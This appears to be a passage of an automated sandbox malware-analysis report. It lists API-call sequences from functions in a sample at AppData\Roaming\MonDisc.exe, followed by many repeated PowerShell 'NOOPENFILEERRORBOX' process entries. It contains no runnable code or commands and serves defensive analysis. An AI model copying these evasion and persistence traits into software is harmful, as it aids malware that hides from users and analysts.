Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F516F GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetSystemDefaultLangID,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,15_2_00007FF62C8F516F
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F5191 GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetSystemDefaultLangID,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,15_2_00007FF62C8F5191
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F517B GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetSystemDefaultLangID,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,15_2_00007FF62C8F517B
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F82C7 GetTopWindow,IsIconic,GetMessageTime,GetLastActivePopup,GetDesktopWindow,GetTopWindow,GetCurrentProcess,AnyPopup,GetLargePageMinimum,GetMessageTime,GetCurrentProcessId,GetTopWindow,GetModuleHandleW,GetMessageExtraInfo,GetTopWindow,GetCurrentProcessId,GetTickCount,GetCurrentProcess,GetLastActivePopup,GetLastActivePopup,GetParent,GetDesktopWindow,GetUserDefaultLangID,GetForegroundWindow,GetForegroundWindow,GetLargePageMinimum,GetMessageExtraInfo,GetLargePageMinimum,GetParent,IsIconic,GetMessageExtraInfo,GetWindowTextLengthW,AnyPopup,GetWindowTextLengthW,GetUserDefaultLangID,15_2_00007FF62C8F82C7
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F832A AnyPopup,IsIconic,GetMessageTime,GetLastActivePopup,GetDesktopWindow,GetTopWindow,GetCurrentProcess,AnyPopup,GetLargePageMinimum,GetMessageTime,GetCurrentProcessId,GetTopWindow,GetModuleHandleW,GetMessageExtraInfo,GetTopWindow,GetCurrentProcessId,GetTickCount,GetCurrentProcess,GetLastActivePopup,GetLastActivePopup,GetParent,GetDesktopWindow,GetUserDefaultLangID,GetForegroundWindow,GetForegroundWindow,GetLargePageMinimum,GetMessageExtraInfo,GetLargePageMinimum,GetParent,IsIconic,GetMessageExtraInfo,GetWindowTextLengthW,AnyPopup,GetWindowTextLengthW,GetUserDefaultLangID,15_2_00007FF62C8F832A
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F825C GetTopWindow,IsIconic,GetMessageTime,GetLastActivePopup,GetDesktopWindow,GetTopWindow,GetCurrentProcess,AnyPopup,GetLargePageMinimum,GetMessageTime,GetCurrentProcessId,GetTopWindow,GetModuleHandleW,GetMessageExtraInfo,GetTopWindow,GetCurrentProcessId,GetTickCount,GetCurrentProcess,GetLastActivePopup,GetLastActivePopup,GetParent,GetDesktopWindow,GetUserDefaultLangID,GetForegroundWindow,GetForegroundWindow,GetLargePageMinimum,GetMessageExtraInfo,GetLargePageMinimum,GetParent,IsIconic,GetMessageExtraInfo,GetWindowTextLengthW,AnyPopup,GetWindowTextLengthW,GetUserDefaultLangID,15_2_00007FF62C8F825C
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F82A9 GetParent,GetTopWindow,IsIconic,GetMessageTime,GetLastActivePopup,GetDesktopWindow,GetTopWindow,GetCurrentProcess,AnyPopup,GetLargePageMinimum,GetMessageTime,GetCurrentProcessId,GetTopWindow,GetModuleHandleW,GetMessageExtraInfo,GetTopWindow,GetCurrentProcessId,GetTickCount,GetCurrentProcess,GetLastActivePopup,GetLastActivePopup,GetParent,GetDesktopWindow,GetUserDefaultLangID,GetForegroundWindow,GetForegroundWindow,GetLargePageMinimum,GetMessageExtraInfo,GetLargePageMinimum,GetParent,IsIconic,GetMessageExtraInfo,GetWindowTextLengthW,AnyPopup,GetWindowTextLengthW,GetUserDefaultLangID,15_2_00007FF62C8F82A9
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F834D IsIconic,GetMessageTime,GetLastActivePopup,GetDesktopWindow,GetTopWindow,GetCurrentProcess,AnyPopup,GetLargePageMinimum,GetMessageTime,GetCurrentProcessId,GetTopWindow,GetModuleHandleW,GetMessageExtraInfo,GetTopWindow,GetCurrentProcessId,GetTickCount,GetCurrentProcess,GetLastActivePopup,GetLastActivePopup,GetParent,GetDesktopWindow,GetUserDefaultLangID,GetForegroundWindow,GetForegroundWindow,GetLargePageMinimum,GetMessageExtraInfo,GetLargePageMinimum,GetParent,IsIconic,GetMessageExtraInfo,GetWindowTextLengthW,AnyPopup,GetWindowTextLengthW,GetUserDefaultLangID,15_2_00007FF62C8F834D
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F8EB4 GetMessageExtraInfo,GetLargePageMinimum,GetParent,IsIconic,GetMessageExtraInfo,GetWindowTextLengthW,AnyPopup,GetWindowTextLengthW,GetUserDefaultLangID,GetForegroundWindow,GetDoubleClickTime,GetUserDefaultLangID,GetLargePageMinimum,GetModuleHandleW,IsZoomed,GetWindowTextLengthW,GetDesktopWindow,GetTopWindow,GetCommandLineW,GetTopWindow,GetMessageTime,GetSystemDefaultLangID,AnyPopup,GetCurrentProcessId,GetUserDefaultLangID,GetSystemDefaultLangID,GetTopWindow,GetSystemDefaultLangID,GetMessageTime,GetMessageExtraInfo,IsZoomed,GetForegroundWindow,GetDoubleClickTime,GetUserDefaultLangID,GetLargePageMinimum,GetShellWindow,GetCurrentProcessId,GetCommandLineW,GetModuleHandleW,GetCommandLineW,GetCommandLineW,GetCurrentProcessId,GetLargePageMinimum,GetMessageExtraInfo,GetWindowTextLengthW,22_2_00007FF62C8F8EB4
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F5101 GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetLastActivePopup,IsIconic,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetLastActivePopup,GetDoubleClickTime,IsIconic,22_2_00007FF62C8F5101
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F56BC GetModuleHandleW,GetMessageExtraInfo,AnyPopup,GetWindowTextLengthW,IsZoomed,AnyPopup,GetShellWindow,GetTickCount,GetLastActivePopup,GetTickCount,GetCommandLineW,GetForegroundWindow,GetTopWindow,GetCommandLineW,GetTopWindow,GetForegroundWindow,GetMessageExtraInfo,IsZoomed,GetShellWindow,GetMessageExtraInfo,GetCurrentProcess,GetModuleHandleW,GetTickCount,AnyPopup,IsIconic,GetWindowTextLengthW,GetTopWindow,GetCurrentProcessId,GetTopWindow,GetShellWindow,GetCommandLineW,22_2_00007FF62C8F56BC
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F81BD GetCurrentProcess,GetLastActivePopup,GetDesktopWindow,GetTopWindow,GetCurrentProcess,AnyPopup,GetMessageTime,GetCurrentProcessId,GetTopWindow,GetModuleHandleW,GetMessageExtraInfo,GetTopWindow,GetCurrentProcessId,GetTickCount,GetCurrentProcess,GetLastActivePopup,GetLastActivePopup,GetParent,GetDesktopWindow,GetUserDefaultLangID,GetForegroundWindow,GetForegroundWindow,GetLargePageMinimum,GetMessageExtraInfo,GetParent,IsIconic,GetMessageExtraInfo,GetWindowTextLengthW,GetLastActivePopup,AnyPopup,GetWindowTextLengthW,GetUserDefaultLangID,22_2_00007FF62C8F81BD
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F63BA GetDesktopWindow,GetDoubleClickTime,GetSystemDefaultLangID,GetDoubleClickTime,GetDoubleClickTime,GetDoubleClickTime,GetDesktopWindow,GetWindowTextLengthW,GetDoubleClickTime,GetWindowTextLengthW,GetCommandLineW,GetForegroundWindow,GetTopWindow,GetLargePageMinimum,GetForegroundWindow,GetForegroundWindow,GetTickCount,GetWindowTextLengthW,IsIconic,GetCommandLineW,GetDoubleClickTime,GetUserDefaultLangID,GetDesktopWindow,GetParent,22_2_00007FF62C8F63BA
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F8F3E GetParent,IsIconic,GetMessageExtraInfo,GetWindowTextLengthW,AnyPopup,GetWindowTextLengthW,GetUserDefaultLangID,GetForegroundWindow,GetDoubleClickTime,GetCurrentProcessId,GetUserDefaultLangID,GetModuleHandleW,IsZoomed,22_2_00007FF62C8F8F3E
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F512F GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetSystemDefaultLangID,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,22_2_00007FF62C8F512F
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F5117 GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,22_2_00007FF62C8F5117
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F8202 GetCurrentProcess,GetTopWindow,IsIconic,GetMessageTime,GetLastActivePopup,GetDesktopWindow,GetTopWindow,GetCurrentProcess,AnyPopup,GetLargePageMinimum,GetMessageTime,GetCurrentProcessId,GetTopWindow,GetModuleHandleW,GetMessageExtraInfo,GetTopWindow,GetCurrentProcessId,GetTickCount,GetCurrentProcess,GetLastActivePopup,GetLastActivePopup,GetParent,GetDesktopWindow,GetUserDefaultLangID,GetForegroundWindow,GetForegroundWindow,GetLargePageMinimum,GetMessageExtraInfo,GetLargePageMinimum,GetParent,IsIconic,GetMessageExtraInfo,GetWindowTextLengthW,AnyPopup,GetWindowTextLengthW,GetUserDefaultLangID,22_2_00007FF62C8F8202
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F516F GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetSystemDefaultLangID,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,22_2_00007FF62C8F516F
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F5191 GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetSystemDefaultLangID,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,22_2_00007FF62C8F5191
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F517B GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetSystemDefaultLangID,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,22_2_00007FF62C8F517B
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F82C7 GetTopWindow,IsIconic,GetMessageTime,GetLastActivePopup,GetDesktopWindow,GetTopWindow,GetCurrentProcess,AnyPopup,GetLargePageMinimum,GetMessageTime,GetCurrentProcessId,GetTopWindow,GetModuleHandleW,GetMessageExtraInfo,GetTopWindow,GetCurrentProcessId,GetTickCount,GetCurrentProcess,GetLastActivePopup,GetLastActivePopup,GetParent,GetDesktopWindow,GetUserDefaultLangID,GetForegroundWindow,GetForegroundWindow,GetLargePageMinimum,GetMessageExtraInfo,GetLargePageMinimum,GetParent,IsIconic,GetMessageExtraInfo,GetWindowTextLengthW,AnyPopup,GetWindowTextLengthW,GetUserDefaultLangID,22_2_00007FF62C8F82C7
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F832A AnyPopup,IsIconic,GetMessageTime,GetLastActivePopup,GetDesktopWindow,GetTopWindow,GetCurrentProcess,AnyPopup,GetLargePageMinimum,GetMessageTime,GetCurrentProcessId,GetTopWindow,GetModuleHandleW,GetMessageExtraInfo,GetTopWindow,GetCurrentProcessId,GetTickCount,GetCurrentProcess,GetLastActivePopup,GetLastActivePopup,GetParent,GetDesktopWindow,GetUserDefaultLangID,GetForegroundWindow,GetForegroundWindow,GetLargePageMinimum,GetMessageExtraInfo,GetLargePageMinimum,GetParent,IsIconic,GetMessageExtraInfo,GetWindowTextLengthW,AnyPopup,GetWindowTextLengthW,GetUserDefaultLangID,22_2_00007FF62C8F832A
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F825C GetTopWindow,IsIconic,GetMessageTime,GetLastActivePopup,GetDesktopWindow,GetTopWindow,GetCurrentProcess,AnyPopup,GetLargePageMinimum,GetMessageTime,GetCurrentProcessId,GetTopWindow,GetModuleHandleW,GetMessageExtraInfo,GetTopWindow,GetCurrentProcessId,GetTickCount,GetCurrentProcess,GetLastActivePopup,GetLastActivePopup,GetParent,GetDesktopWindow,GetUserDefaultLangID,GetForegroundWindow,GetForegroundWindow,GetLargePageMinimum,GetMessageExtraInfo,GetLargePageMinimum,GetParent,IsIconic,GetMessageExtraInfo,GetWindowTextLengthW,AnyPopup,GetWindowTextLengthW,GetUserDefaultLangID,22_2_00007FF62C8F825C
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F82A9 GetParent,GetTopWindow,IsIconic,GetMessageTime,GetLastActivePopup,GetDesktopWindow,GetTopWindow,GetCurrentProcess,AnyPopup,GetLargePageMinimum,GetMessageTime,GetCurrentProcessId,GetTopWindow,GetModuleHandleW,GetMessageExtraInfo,GetTopWindow,GetCurrentProcessId,GetTickCount,GetCurrentProcess,GetLastActivePopup,GetLastActivePopup,GetParent,GetDesktopWindow,GetUserDefaultLangID,GetForegroundWindow,GetForegroundWindow,GetLargePageMinimum,GetMessageExtraInfo,GetLargePageMinimum,GetParent,IsIconic,GetMessageExtraInfo,GetWindowTextLengthW,AnyPopup,GetWindowTextLengthW,GetUserDefaultLangID,22_2_00007FF62C8F82A9
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F834D IsIconic,GetMessageTime,GetLastActivePopup,GetDesktopWindow,GetTopWindow,GetCurrentProcess,AnyPopup,GetLargePageMinimum,GetMessageTime,GetCurrentProcessId,GetTopWindow,GetModuleHandleW,GetMessageExtraInfo,GetTopWindow,GetCurrentProcessId,GetTickCount,GetCurrentProcess,GetLastActivePopup,GetLastActivePopup,GetParent,GetDesktopWindow,GetUserDefaultLangID,GetForegroundWindow,GetForegroundWindow,GetLargePageMinimum,GetMessageExtraInfo,GetLargePageMinimum,GetParent,IsIconic,GetMessageExtraInfo,GetWindowTextLengthW,AnyPopup,GetWindowTextLengthW,GetUserDefaultLangID,22_2_00007FF62C8F834D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
